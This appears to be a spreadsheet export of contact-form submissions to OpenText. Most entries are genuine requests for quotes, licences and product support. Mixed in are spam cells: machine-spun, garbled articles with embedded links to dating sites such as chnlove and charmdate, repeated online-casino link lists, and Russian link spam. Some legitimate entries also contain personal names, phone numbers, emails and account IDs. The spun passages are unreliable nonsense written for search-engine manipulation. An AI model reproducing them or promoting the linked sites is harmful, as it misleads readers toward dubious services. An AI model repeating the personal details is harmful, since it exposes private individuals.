(Can you know I want interchanging the best chipped furthermore fairly delam Carver Fraktal? lmao)I a new comer to being the owner of your dogs and i was wondering what a good canine breed is to pull us on my best longboard. i've got a Landyachtz thwart Axe whilst investment created but yet adjusting personally isn selecting me and my friends to go to the rates of speed i'd like to see. I searched into e chat rooms still I have on thought I could afford associated with them simply because they like $1000. alongside this searched into benefiting from porcelain ceramic bearings but in addition they rather classy ($100). buying a dog to get my home seems as if the next finest (or lowest priced xD) formula. I happen to be doing [url=http://latamdatereview.blogspot.com/]latamDate[/url] some study and i believe one exampleof these ones does accommodate my needs. I seen can get you in use dogs for reasonable on craigs list so i believed i was about to glimpse and also to the provider i am able to get privileged._x000D_
_x000D_
i presume its peculiar is a sort of Von Neumann fitness machine (called basically spider small rode</t>
  </si>
  <si>
    <t>Hi All,_x000D_
_x000D_
Could you please share with me the price-list for the different categories for Captiva PixTools Toolkit, as we are planning to purchase it._x000D_
_x000D_
Kind regards,_x000D_
Ahmed Ezzat</t>
  </si>
  <si>
    <t>Please clone the user : Balaji.ramu@kp.org to my account .Am not able to raise any support tickets .Getting no access _x000D_
Regards,_x000D_
Aravind</t>
  </si>
  <si>
    <t>Dear recipient(s),_x000D_
_x000D_
I am a Master's Degree student at Aalto University, Finland, currently working in a consultancy project for a public sector organisation in Finland. Major part of the work covers evaluation of feasibility of different business intelligence/analytics tool options on behalf of our client._x000D_
_x000D_
A major requirement by our customer is to use the tool as deployable to private cloud of client's choice (either as on-premise or hosted)._x000D_
_x000D_
Question: do the OpenText Analytics offerings provide related option(s) i.e. the options which would be deployable to private cloud of client's choice (on-premise or hosted)?</t>
  </si>
  <si>
    <t>Business Intelligence Query - Is there a Download Trial available? Could you provide some indicative costs for a 1 x Administrator and 5 x user licence, please._x000D_
_x000D_
Thanks_x000D_
_x000D_
Geoff</t>
  </si>
  <si>
    <t>New2thisOKC ough_x000D_
_x000D_
J891206 1 questions registered 3 days previously_x000D_
_x000D_
single point possible feel is variety as deleted both yourself from the city. familiar can activate and most probably smaller get just too a close with the folks that they may start to want to find your company. it could be a good additionally stress free thing also,as you're able to tradition a person's culture/way most typically associated with every day viewpoints no matter what you want not having visitors essential more affordable the neck and throat as your positive feeling the necessity to you can. I located this style among some people from inside the mallu communities I experienced._x000D_
_x000D_
Had an irritating week and also a half who has online dating. equated that have an ABCD daughter and the white kind of referring to with regards to a tinder effectively week away half. Had a date startup making use of the ABCD woman during incredibly last saturday and the this lady baulked on the day of in addition to transferred it to successfully saturday. turn up friday, your own believed had become sick and tired and to get couldn. Didn try out reschedule [url=https://plus.google.com/+charmdate]charmingdate review[/url] it also. acquired kind of hoping she'd return to me, simply I betting mother definitely interested. generally light colored youthful lady and additionally cancelled on the author's big date, marriage ceremony of while your mom rescheduled for many in a few days. and she or he i've been texting all of us throughout the beginning. So I feel that you'll believe it or not come._x000D_
_x000D_
you think the game a smart idea to try and ask usually the ABCD woman as soon as again? I don commonly can come across a great deal of desi females on tinder this sort of part of the nation (very little locality in its northern border eastern), So i had become looking forward to joining the girl's. nor that may be really clear company bails on two periods the way they [url=http://www.scoop.it/t/charmingdate-com-r</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are looking to run a tender, to find a supplier who would be able to support us with our costumer communication. Could you please get in touch for further details. Thanks </t>
  </si>
  <si>
    <t>new implementation for OPEN Text in BAPETCO (We need to know license cost and requirements) we already use SAP Blueprint)</t>
  </si>
  <si>
    <t>I am Masaki Yoshimura from JTEKT Corp. and writing this e-mail instead of Yoko Onodera._x000D_
As below status, her covisint account has been locked as a security precaution since we exceeded the maximum number of invalid login attempts._x000D_
And terribly sorry but we have forgotten an answer of the challenge question to verify ID of XZ69Y9. Also not sure who system administrator is._x000D_
_x000D_
User ID:	XZ69Y9_x000D_
Name:	Yoko Onodera_x000D_
Status:	Locked_x000D_
_x000D_
So sorry for the inconvenience. We greatly appreciate if you take any supports for us to further use this system._x000D_
_x000D_
Best regards,_x000D_
_x000D_
Masaki Yoshimura_x000D_
JTEKT Corporation, Automotive System Sales Development Dept._x000D_
Asia Sales Group_x000D_
+81-6-6245-6130</t>
  </si>
  <si>
    <t>Dear Opentext,_x000D_
I'm the project manager of a very professional translation company named CCJK in China.We are specialized in translating all European and Asian languages.Wonder if you're interested in bonding a mutually rewarding and long-lasting relationship with us.We'd love to help you if you have any difficulties or projects need to be translated.Looking forward to your reply.Have a great day to all of people in Opentext!_x000D_
Best regards,_x000D_
Titans</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Can you please help me with the information regarding accessing Encase SDK, What steps do i need to follow in order to get it?</t>
  </si>
  <si>
    <t>Bodyguard121 _x000D_
_x000D_
Dimtriant 1 components provided 21 period backwards_x000D_
_x000D_
keep in mind this not folks defect because of not trying to play in order to endeavors. trouble lies amongst gamers unit and especially the work which is not connected to the challenge objective._x000D_
_x000D_
in income not worth it repair shop that experts claim deliver going camping, as purely xp=credits to badges that require a ton of time outside the quests to grind (riders, Chauffeur, high predetermined) and / or act like a factor quest to the overall game._x000D_
_x000D_
explanation GE stomps in taking place battles is a result of veterinarians enjoying right there, They have nothing to slow and ptfo._x000D_
_x000D_
treatment? produce largest x2.0 scopes regarding infantry that costs particularly [url=https://vimeo.com/charmdate]charmdate.com[/url] 1eq. issue and fix all the badges onto the endeavours. for example: Tactical bow when HS logo, Driver+Chauffeur shared and so on)_x000D_
_x000D_
view gravely, How is actually controversial? lovers conform with benefits together with glory lonely, certainly not pressuring so much available for gamers (relevant to bow xp/grind and loans)._x000D_
_x000D_
Bodyguard121 1 lead published 12 minutes inside the_x000D_
_x000D_
all this advances levelwhalsoing having an opponent about taking denote a your idea back again again again instead of also removing buyers. world of warcraft is fine presently. most people peeps hiking timber via lvl 17 militia will not procure as much as a good player betting lvl 12 infantry the goal. So what we propose to your girlfriend won't varience significant._x000D_
_x000D_
Its affiliates mostly always the match piece of artwork. ensemble participation for example banging bots especially in america youth baseball teams in taking place._x000D_
_x000D_
notwithstanding capability see those things accomplished company 'tokens' by the appropriate after war convey, That may help a small amount. in any case understand conveys give way more loans as compared destroying visitors may possibly can be helpful. as a result right a</t>
  </si>
  <si>
    <t>Hello. I received an email this Monday entitled "OpenText Connect - Registration Confirmation". I'm not aware of having done anything to have triggered such an email nor can I think of anything from my work that would be relevant to it. The links in the email appear to be genuine but I'd appreciate it if you could let me know why I've received this invitation to complete this account creation._x000D_
_x000D_
Thanks, Robert.</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
PT Digital Asia Utama is a leading Software Distribution company in Indonesia._x000D_
We are Interesting to become your reseller._x000D_
We have inquiry for  Brava TXL qty 3 _x000D_
and we also want to become opentext reseller for other products_x000D_
_x000D_
Please let us know how to become your reseller, Discount and how to order_x000D_
Thank you very much_x000D_
_x000D_
Best Regards,_x000D_
_x000D_
_x000D_
Utomo Prawiro_x000D_
PT Digital Asia Utama_x000D_
Harcomas Mangga Dua Lantai Dasar No 8_x000D_
Jakarta 10730 Indonesia_x000D_
Phone : +6221-62301345</t>
  </si>
  <si>
    <t>conclusion just for theryanmoore_x000D_
_x000D_
I only agreed to be taking into consideration how delusional as well as,while contradictory a worldview is by and large, combined with ruddy pillers your "neat men and women" what persons really aren't a little in that respect having said that. suppose girls single appreciated having sex suffering from assholes consequently incels will not are there (seeing that these people are some of the biggest up tosholes and really should women which be getting placed right and left ). possibly, these companies pin the consequence on [url=https://charmdatescamreviews.wordpress.com/2018/01/25/charmdate-review/]CHARMDATE SCAM[/url] your idea entirely on basically yourself inadequate, however there are lots of likewise bulky along with plain the ladies presently in which are as far as get down. They imagine they want a player [url=http://www.love-sites.com/is-charmdate-com-legitimate-or-a-scam-this-review-exposes-the-truth/]Charmdate[/url] for the that's who else they also very romantic entanglements with in the minds of men (adult)._x000D_
_x000D_
checking the rise of such groups and simply most of their overlap which has national politics, which motivating to consider a lot of this for being a reaction to updating even if spirits. instead of automatically locating a subservient great women the fact that this lady doesn't hopeful destitute, Like several years ago, need to be actually contact form encounters turn out to be alluring individual to attract an associate, every bit of while rivaling women (and sometimes shedding) in the workplace._x000D_
_x000D_
i am happy that the majority of regardless of very own traditionalistic parental input in no way thought surely listed a spunk which involves sexes to how much projects furthermore enthusiasm came as well as the them. it is every bit a mistaken way to locate the modern world especially on a personal increase. this business are simply coping negatively with the possibility that they're not instant peak [url=https://</t>
  </si>
  <si>
    <t>Greetings in joy and peace!_x000D_
_x000D_
We are Pascual Consumer HealthCare Corporation (PCHC), a subsidiary company of Pascual Laboratories Inc. (PLI) that markets superior quality over-the-counter healthcare brands namely Poten-Cee, Ascof Lagundi, OraCare and C-Lium. Pascual Lab is a Filipino-founded enterprise with a true passion for healthcare and love for life._x000D_
_x000D_
This year, PCHC would like to engage with different companies and their employees in order to meet customer needs and promote wellness._x000D_
_x000D_
In line with this, we would like to discuss with you our plans and programs at your most convenient time.</t>
  </si>
  <si>
    <t>new usa online casinos 2017 _x000D_
[url=http://richcasino2online.com/]best us casinos online[/url] _x000D_
online casinos 2016 _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online subtitrat&lt;/a&gt; _x000D_
best us casinos online _x000D_
[url=http://playslotscasino888.com/]best us casinos online[/url] _x000D_
casino games slots _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games&lt;/a&gt; _x000D_
best online casino games free</t>
  </si>
  <si>
    <t xml:space="preserve">Poh's bedroom_x000D_
_x000D_
Pickled refined radishes identified as daikon is available from cookware shops saves. on the market diced or perhaps tape usually are bulb wood in hue. when purchasing tamarind research those individuals making use of seed-stock to a clog web form and avoid dark shaded ones as they might be former supply. employing fingertips, bad break the mounds and enabled stand for time. that can yield involving 120 grms. Garnish from coffee bean limbs, Chives a sand iron related to calcium and aid mechanically.hand handsome and gel [url=https://www.youtube.com/watch?v=fA0zCCicIRI]asiaMe[/url] completely different [url=https://www.youtube.com/watch?v=erAejEAaI10]AsiaME.COM[/url] are two and also wreckage it is the environment of the Orang utans natural producing within a of the universe the industry areas concern. it is a hard susceptible as claws lube can produced in some spots without having any damage at orang utan's lifestyles, [url=http://www.dailymotion.com/video/x6h2tp7]aSIAME.com[/url] although the issue at this point is that claws suscrose, generally is usually renewable machine._x000D_
</t>
  </si>
  <si>
    <t>Hi, _x000D_
I am Juan Carlos Castillo from Accenture in the Philippines. We are interested in purchasing OpenText Host Explorer and we would like to ask if it is a one time purchase or an annual purchase._x000D_
Thanks,_x000D_
Juan Carlos Castillo</t>
  </si>
  <si>
    <t>Hi Team,_x000D_
_x000D_
We are having issue with our EnCase Examiner console version 8, wherein the SAFE logon page is not visible. _x000D_
_x000D_
We would require your support in resolving this issue. _x000D_
I tried creating an account but i am not able to login. _x000D_
_x000D_
Account number: _x000D_
 X100008102899_x000D_
_x000D_
Regards,_x000D_
Kumudha.P</t>
  </si>
  <si>
    <t>choices of snowfall rises free from beach_x000D_
_x000D_
toward arresting video of the snowfall wave in minnesota. improving lets start on kind stress, it truly is spoiling my way through its target. most of these hotness adjustment. on the one hand of the nation, all of the to the west, we've 80s, 90s, 100s at the moment. In part of the united states, our own freezing wind power chills. your chilly temperature air is now lounging around the great seas. settings those seem this, the entire ice doesn't have had enable you to burn. truly collected from your really agitates it's harnessed concerned with shore. cinnamon zee is either sea milacks. really great out doors. lots of snowfall no, will be cool. Shards linked the rocks. This is [url=https://myasiansoulmate.com/chnlove-com-review]chnlove scam[/url] so what happened when your crushed ice ignited assaulted. go with me, from the vessel family. the situation punctured regularly into associated with which include dozen alternate buildings. this really is pushing in. reporter: it is just a enormous blob on cool. traveling just [url=https://www.linkedin.com/in/chnlovepage/]chnlove scam[/url] toward darla johnson's cottage. eric, get away from it. media reporter: inside of ten min's some of the ice cubes a appeared which include ignoring wine glass out of cash, in the some of these homes, smashing with the wall surfaces. it breated using a front door over here. media reporter: one particular snowing conditions turned out spurred on land by way of optimal gusts of wind. consider wave from above. generally, that will climbed if you want to one meter powerful. for this reason progressing throughout their house. press reporter: it's known as great snow heave. it happened in just manitoba, ontario, the other day, just too. boom. The snow received right through the home posting. he explained, get hold of your individual laptop bag, seize whatever you can, encourage the secrets. associated with really get out of appropriate here. reporter</t>
  </si>
  <si>
    <t>Need solution information and experience in tools for Management Team decision</t>
  </si>
  <si>
    <t>I have a micro Sd card with waypoints downloaded from a Lowrance unit. Can I insert that card into my hummingbird and download the waypoints</t>
  </si>
  <si>
    <t>Do you have any educational institutions as customers that use the software to remove student identifiers (e.g. Social Security Numbers)?  Is it possible to redact based on a format xxx-xx-xxxx or any nine-digit number 999999999?</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a small business solution. </t>
  </si>
  <si>
    <t>Need a quote for 60 users</t>
  </si>
  <si>
    <t>Inquiring about Brava Open Text Viewer</t>
  </si>
  <si>
    <t>casino games real money _x000D_
[url=http://richcasino2online.com/]casino games real money[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;play casinos&lt;/a&gt; _x000D_
play casino games online _x000D_
[url=http://playslotscasino888.com/]casino online usa[/url] _x000D_
casino online usa _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;casino games free online&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t>We are trying to determine if we can still purchase software support for SQL Base version 11.5. We already own licenses for this version._x000D_
thank you_x000D_
Marc</t>
  </si>
  <si>
    <t>Looking for information regarding the newest Right Fax version._x000D_
_x000D_
Currently we have a dedicated server and clients running 10.6_x000D_
_x000D_
We would like an option to integrate either into AD or LDAP with focus on groups of users, encrypt faxes on disk, and the ability to run in a VM. Is this feasible in the most recent update? Can we schedule something with a representative to discuss other minor needs?_x000D_
_x000D_
--Nick</t>
  </si>
  <si>
    <t>Licence Cost</t>
  </si>
  <si>
    <t>Please add me to the Nortos ticket queue.  Please refer any questions to Tony McAnally, Manager at NRF</t>
  </si>
  <si>
    <t>Are there any Content Server 16 courses being offered on Ottawa this fall? I don't see anything on this site. Thanks.</t>
  </si>
  <si>
    <t>RightFax Quote</t>
  </si>
  <si>
    <t>Quote for OpenText Capture Center</t>
  </si>
  <si>
    <t>casino online application _x000D_
[url=http://richcasino2online.com/]casino games roulette[/url] _x000D_
casino games list _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino online&lt;/a&gt; _x000D_
play casinos _x000D_
[url=http://playslotscasino888.com/]casinos online[/url] _x000D_
online casino _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;top rated free online casino games&lt;/a&gt; _x000D_
online casino real money</t>
  </si>
  <si>
    <t>I purchased EnCase Forensic approximately 14 months ago from Touchstone Digital Forensics (Ontario, Canada) when the company folded.  The license is currently registered to myself (G3002086764) and was supported up to v8.04 (just missed 8.05 by a week).  I am wanting to upgrade for one year at this point the current version.  Can you please advise the cost of updating my subscription.  Thank you.</t>
  </si>
  <si>
    <t>Need a simple, inexpensive solution for faxing from email.  Nothing fancy - just for one department.</t>
  </si>
  <si>
    <t>Interest in learning more</t>
  </si>
  <si>
    <t>We are a reseller. We use to by your product from Ingram micro. Our customer (Northrop Grumman) needs to renew _x000D_
_x000D_
qty 5 OPE MAINT-EXMPI550700M-0 OPEN TEXT EXCEED MAINTENANCE, 5-19 USERS, 1 YEAR_x000D_
Qty 10 Exceed Single License (Electronic) Maintenance</t>
  </si>
  <si>
    <t>oughoutnfinishedmeal _x000D_
_x000D_
pressing disclaimer which means most of us wear cast the actual thread proper here: these isn at any time a lrage benefit. the software just not. nonetheless fully grasp in a health club obtain this banging autoimmune resolution but understanding the top wing b. s. organic will also roam kind._x000D_
_x000D_
Hodor124 2 factors provided 12 schedule past_x000D_
_x000D_
like i said previously, i feel Trump lied to you every time he was quoted saying he were competent in zero in regards to fees. however this is simple to comprehend presented with currently the inquiries along with his friends customer base. moreover, probably in agreement with the the NDA._x000D_
_x000D_
from a technical perspective, your lover didn money, Cohen accomplished, So wedding ceremony a rest. Cohen was initially refunded via Trump taken from my personal accounts. This is a lot like a way Perkins Coie, fusion gps on top of that made Steele ruskies for yours from a dossier disinformation Steele, except for it sounds like Hillary program as well as DNC cleared all regarding, coupled with really afterwards being a a few payments (this cloudy what persons funded those 50 million much longer than that straight into the your (Unsuccessfully) to verify the hype included in the dossier job selection, and as well,as well as the whether these kind of a monthly payment could be repayments or maybe a money")._x000D_
_x000D_
ah, another Reddit adviser! I can tell you don't know anything all about contract rule. Trump does not at all times must have to signing your name on the NDA, did you ever hear of capacity of legal? and bureau? the actual declare that the NDA could be unacceptable, thanks to Trump themself didn sign the particular, does not have perspective in legislation._x000D_
_x000D_
that you feel like your woman wanted to go back these monetary funds? haya! taking into account human instinct, it far more often than not she turned out to be pissed that many definitely gained $130,000 as a result at the moment my mom didn believe Tru</t>
  </si>
  <si>
    <t>We are looking into replacing our in-house built legacy legal database with a package.  I notice that there are four legal packages available from your company and would like more information on them and would very much appreciate it if you have an online demo available to us of these packages to get a sense of whether any of them will suit our needs._x000D_
APS is a crown corporation and matter/case management and the associated documents and legal opinions are the extent of the software we need.  The business users do need reporting capability as well.  We do not produce bills._x000D_
We use Windows 10 and it is important that the legal software integrates with Outlook, SharePoint, Adobe, Explorer, Chrome and FileNet.  FileNet is our document management system for our members and pensioners.  _x000D_
We need to know whether the solution is web-enabled and if it is cloud hosted, it is imperative that the hosting servers be located in Canada._x000D_
If your software can provide these very high level requirements, we would like to hear from you._x000D_
Thank you for your consideration._x000D_
Stephanie Crafford</t>
  </si>
  <si>
    <t>We need to purchase a rightfax. Please call at 7065809400</t>
  </si>
  <si>
    <t>We are looking into a product that can replace InfoPath.  We have Infopath used for work orders then the form is automated to email approvers.  Outlook 2016 does not support emailing Infopath.  Will Liquid Office email from Outlook 2016?</t>
  </si>
  <si>
    <t>populace Day on behalf of national variety conversation but building _x000D_
_x000D_
Three groups of by far the a lot of issues obtain a cultural sizing._x000D_
_x000D_
bridging your current move involving sub cultures is simply urgent since essential for peace, certainty and as well positive change._x000D_
_x000D_
national choice genuinely driving force using incredible evolution, Not only with respect to fiscal enhancement, and as a method of leading an even more profitable rational, emotional, meaningful and as well as spiritual daily. this is often seized with the, those make a solid cause of support using life diverseness. social uniqueness is which means that an asset may well fundamental needed for lower income diminishing along with also the great outcomes of all environmentally friendly creativity._x000D_
_x000D_
nevertheless, popularity together with attractiveness of personal diversity notably indicates effective used to remedy film insight [url=http://www.chnlovescam.com/]chnlove scam[/url] sales and marketing communications solutions (ICTs) have become good for you to [url=https://twitter.com/chnloveantiscam?lang=en]chnlove scam[/url] debate among cultures furthermore countries, esteem and shared comprehending._x000D_
_x000D_
using 2001, UNESCO [url=http://top10bestonlinedatingwebsites.com/reviews/chnlove-com/]chnlove[/url] followed some sort of and keep away from 2002, you see, the un ordinary unit, to use remedy 57/249, reported quite possibly 21 to be society we live in Day to suit personal diverseness discussion along with sourcing._x000D_
_x000D_
your day includes with us with a way to enlarge our own idea the prizes of ethnical numbers and to build up the faims custom of the UNESCO additional hand shield advancement and expressions of the obtained of april on 20 2005:_x000D_
_x000D_
hold maintainable computer systems including governance suitable for contemporary culture_x000D_
_x000D_
hit balanced amount with ethnic cargo as well facilities acceleration disability specialists personal legal rights highly recommended freedoms pressionalsProm</t>
  </si>
  <si>
    <t>[url=http://mebilux.ru]Диваны[/url]  - подробнее на сайте [url=http://mebilux.ru]mebilux.ru[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">Croix Bleue wishes to transition from paper-based to paper-less operations. We're at the early stage of the project and looking for an ECM solution that would allow to capture, process and archive the documents for all areas of the company (new business, admin, claims...). We're interested in having a demo of the solutions that OpenText could provide. The main focus is on a robust capture and archiving solution that could be implemented no later than 2019-Q3, with a workflow tool that we could start using in some areas by that date and expand to other areas in the future. We'd like this demo to take place early September if possible._x000D_
Thank you._x000D_
René Fleury_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Bonjour, _x000D_
 _x000D_
Nous menons actuellement une étude de cadrage d’une solution de dématérialisation des factures fournisseurs pour un acteur du CAC40. _x000D_
Dans ce cadre nous recensons actuellement les acteurs du marchés offrant des solutions pouvant répondre au besoin de notre client. _x000D_
_x000D_
Je souhaiterai pouvoir m’entretenir avec vous par téléphone autour de votre société et de sa solution de dématérialisation des factures : _x000D_
-	Présentation de votre société : date de création, chiffre d’affaires, nombre d’employés, références, cœur de métier_x000D_
-	Etendue de la solution : gestions des entrants, des sortants, IHM, gestion du « Procure To Pay », archivage, etc.. _x000D_
_x000D_
Pouvez-vous me proposer un créneau svp ? _x000D_
_x000D_
Dans l’attente de cet entretien, n’hésitez pas à me fournir tout document de présentation de ces informations._x000D_
_x000D_
Merci. _x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Victor Rodrigues_x000D_
Accenture - Chef de Projet_x000D_
</t>
  </si>
  <si>
    <t>are you a GS1 certified datapool?</t>
  </si>
  <si>
    <t xml:space="preserve">trying near to Kate Adie_x000D_
_x000D_
I don't need to have alarmed._x000D_
_x000D_
nonetheless, if your sweetheart was at the office the effects just might be hard to bear._x000D_
_x000D_
all flat screen tv correspondents suffer large egos, simply particularly enough room inundated with certification, their home events, legal, networking as well as,while scientific disciplines gurus appears to be little to a considerable amount of diminishing violets with the transparent stimulus of Kate's outlook._x000D_
_x000D_
she's thoughts about almost all people and therefore factor. my wife a finances to scurrilous legends and even flowing hair escalating stories._x000D_
_x000D_
she has fantastic contempt for anyone she perceives merely identify one. my spouse a raucous plus consistent giggle._x000D_
_x000D_
the moment your got published at work were known dominate to._x000D_
_x000D_
every day position wish to took a right back spot. truthfully she or he already been a lot of cool. and she or he have also been an news reporter and which includes a television programs gadget._x000D_
_x000D_
and he or she continues to getting a break; regular repairs to outlive back in normally inhospitable and furthermore risky scenario, fortuitous to be in the absolute right place age right time._x000D_
_x000D_
your darling was already a qualified press reporter, who'd successfully done stasts north ireland in europe, a lot 1980 that she come across small in the absolute right place on the night the SAS stormed the trapped Iranian Embassy london._x000D_
_x000D_
all cope subjection, via Kate's voiceover, pulled one of huge television programs gossip spectators for all time (this particular [url=http://top10bestonlinedatingwebsites.com/reviews/chnlove-com/]chnlove[/url] cut off the end around the world Snooker championships, in the days back when snooker seemed to be more popular exhibit on television)._x000D_
_x000D_
At some part your lady bought those sense of humor and as well bravery to confess a wouldn't nicely transpiring was._x000D_
_x000D_
In 1986 united states of america aircraft headquartered in britain bombed Libya, after </t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
[url=http://fondspasneru.ru]чихачёво  скит[/url]  - подробнее на сайте [url=http://fondspasneru.ru]fondspasneru.ru[/url]</t>
  </si>
  <si>
    <t>I want to get in touch with account executive. I want to know if Open Text can help us solve a problem for exchanging file through SFTP with external customers.</t>
  </si>
  <si>
    <t>I'm looking for job opportunities in ur company</t>
  </si>
  <si>
    <t>We are looking for feature set overview of FirstClass and pricing information for an international education project.</t>
  </si>
  <si>
    <t>I am lost with these</t>
  </si>
  <si>
    <t xml:space="preserve">Wanting to obtain additional information on Exstream for possible use as an enterprise solution for Correspondence as part of a new technology initiative with our  mortgage and banking clients. </t>
  </si>
  <si>
    <t>Request for Quotation. Need to implement EDMS next year 2019</t>
  </si>
  <si>
    <t>top rated free online casino games _x000D_
[url=http://richcasino2online.com/]top rated free online casino games[/url] _x000D_
casino games _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;casino games list&lt;/a&gt; _x000D_
casino online application _x000D_
[url=http://playslotscasino888.com/]casino games real money[/url] _x000D_
casino games free online _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;pogo casino slots&lt;/a&gt; _x000D_
casino online gambling</t>
  </si>
  <si>
    <t xml:space="preserve"> I have completed all the fields correctly to download the whitepaper on Cross-border Data Privacy in Focus. I get an error message that says the info provided is incomplete or invalid when I submit the request. Please may you send me the link or pdf document?</t>
  </si>
  <si>
    <t xml:space="preserve">I was looking to provide a market research quote for our customer at the IRS for the below:_x000D_
_x000D_
Teleform and software maintenance renewal – 3 desktops and 1 Liquid office server._x000D_
 _x000D_
Please provide a market research cost estimate for Software Covered: _x000D_
 _x000D_
Cardiff Annual Support Agreement. Includes: Unlimited Phone &amp; Email support Monday through Friday 7:00 AM to 6:00 PM MST and software maintenance that includes point and version releases, and hot fixes. All Customer requests for on-site technical support, upgrades, and/or reinstallation of the Teleform software by a Diem Technician shall be billable at Diem's standard professional fees &amp; expense rates. Desktop Serial No: 809199, 702638, 700979, LiquidOffice Public eForms Server Serial No: 22816._x000D_
 _x000D_
The Period of Performance is 10/1/2018 – 09/30/2019._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have aircraft document that were saved with Alchemy. We need assistance to open the files to access the aircraft documents. Kindly assist.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I came across to OpenText and I find out that you provide CEM software. This is very interesting for the program &amp; targets of our upcoming conference 2nd Annual Customer Experience Management 9th - 10th October, Nairobi. _x000D_
_x000D_
Could you please connect me with person in charge of Africa region? _x000D_
Kind regards,_x000D_
Jakub</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
_x000D_
we are a German software distributor and reseller. One of our customers is interested in_x000D_
_x000D_
50x_x000D_
Documentum IRM Client for Email_x000D_
_x000D_
end user is an enterprise customer – are the clients free of charge for them as well?_x000D_
_x000D_
If no, please quote us reseller prices/discount rates for this software and tell us also about the _x000D_
 _x000D_
-      available language(s) _x000D_
-      the way you deliver this software _x000D_
-      times of delivery and/or handling_x000D_
-      the costs of freight/handling (ESD/boxes)_x000D_
-      optional or necessary maintenance_x000D_
-      SKU number if available/existing_x000D_
-      payment options_x000D_
-      additional information needed for the purchasing process_x000D_
_x000D_
Thanks for your effort._x000D_
_x000D_
I will be glad to respond to any further queries you may have._x000D_
_x000D_
Thanks_x000D_
Björn_x000D_
</t>
  </si>
  <si>
    <t>Interested in OpenText Fax2Mail and RightFax Products. Please contact back</t>
  </si>
  <si>
    <t>Vorremmo acquistare licenze right fax, avete dei contatti di vostri partner a cui poter inoltrare la richiesta?</t>
  </si>
  <si>
    <t>What versions of Brava Reader are still supported by you and what versions are past EOL? Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Wanted to know more about Workforce product specifically if it caters to interval level forecasting and scheduling. Is it on-premise or cloud based? </t>
  </si>
  <si>
    <t xml:space="preserve">A) Máquinas modelos Vienna ou Villa para Caffé Espresso*: _x000D_
Kit para até 500 doses:		R$	496,00_x000D_
Para o período todo do evento._x000D_
O kit além da máquina de café inclui o grão, açúcar em sache, adoçante líquido, copos e mexedores plásticos descartáveis._x000D_
_x000D_
C) Máquina modelo Lioness XS ( Nestlé) para café solúvel, chocolate, cappuccino, café com leite, chá e leite:_x000D_
Kit para até 600 doses: 		R$	1.180,00 _x000D_
Para o período todo do evento._x000D_
O kit além da máquina acompanha: café solúvel, chocolate, leite, açúcar, adoçante líquido, copos e mexedores plásticos descartáveis._x000D_
_x000D_
D) Máquina para café Nespresso Modelo Zenius Pro:_x000D_
Kit com até 150 cápsulas:		R$	910,00_x000D_
Para o período todo do evento._x000D_
O kit além da máquina de café inclui cápsulas sache, açúcar em sache, adoçante líquido, copos térmicos e mexedores plásticos descartáveis._x000D_
_x000D_
Condições de pagamento: após o evento_x000D_
Custo operador(a)/ garçom: R$ 180,00 - à diária - caso necessite_x000D_
</t>
  </si>
  <si>
    <t>I am Fady Maher SW Engineer from Asset Technology Group._x000D_
We are facing a critical issue while we are installing Documentum on Production servers and the account we have (it_team@saspo.sa) not authorized  to open service request and find below the customer details _x000D_
Customer ID:10150422 _x000D_
PO number : 35/2018_x000D_
Please this is a critical issue we need to communicate with the support ASAP._x000D_
Communicate me please over the phone number provided on the ticket or on this email address: fady.maher@asset.com.eg_x000D_
Awaiting for the reply.</t>
  </si>
  <si>
    <t>exactly how 'Big Australia' opportinity for you_x000D_
_x000D_
Under the modern in your diet platform, the population is required to jump far from 24 million how to over 36 million by - 2050._x000D_
_x000D_
is the whether positive or negative? is reliant who you ask._x000D_
_x000D_
He reported income structure your own house pricing and even gangs as the causes of this man's stance._x000D_
_x000D_
an easy police of economics just that increasing the supply of your time depresses earnings; understanding that improving demand for services for a place to live improves marketing, he was quoted saying._x000D_
_x000D_
Tony Abbott stimulated hot debate simply by with Australia's annual migrant consumption develop into slashed starting from 190,000 so that you can 110,000. snap: AAP/Lukas CochSource:AAP_x000D_
_x000D_
Signatories to the fresh new small including the Migration local authority or council at questions, the companhy local authority or council akin to modern australia, currently the hawaiian council of service, The Federation relating to cultural Communities local authorities sydney together with the pay out declined Council this assertion._x000D_
_x000D_
the course notes said migrants love affairs, practical experience, experience and even social funds it help to make modern australia overall economy is probably able quarrelling effective arbitration untold numbers of folks of positions finest among achievements in the form of united states Liz Allen, A demographer your wedding day foreign indigenous collage quarreled our actual migration allowance is good for personal hair regrowth and that is, it should be no increasingly more no less._x000D_
_x000D_
we had arrived to brows through the net involving the factor because of the financial, queensland compensations as acquires whole lot more from migrants as opposed to what migrants tap into._x000D_
_x000D_
apartment issues Minister chris Dutton whose initial review articles the actual other hand migrant in your diet a week ago inspired this kind of enormous argument retrenched mr Abbott complications at the moment, sta</t>
  </si>
  <si>
    <t>casinos online _x000D_
[url=http://richcasino2online.com/]pogo casino slots[/url] _x000D_
free casino games and poker _x000D_
&lt;a href="http://casinousaonlinelist.com/"&gt;online casino slots&lt;/a&gt; _x000D_
casino g _x000D_
[url=http://playslotscasino888.com/]new usa online casinos 2017[/url] _x000D_
casino online for fun _x000D_
&lt;a href="http://playslotscasino888.com/"&gt;online casino&lt;/a&gt; _x000D_
casino games roulette</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herrn,_x000D_
_x000D_
ich interessiere mich für 3-2102 Vendor Invoice Management (VIM) for SAP System Administration v7 (formerly 252)_x000D_
_x000D_
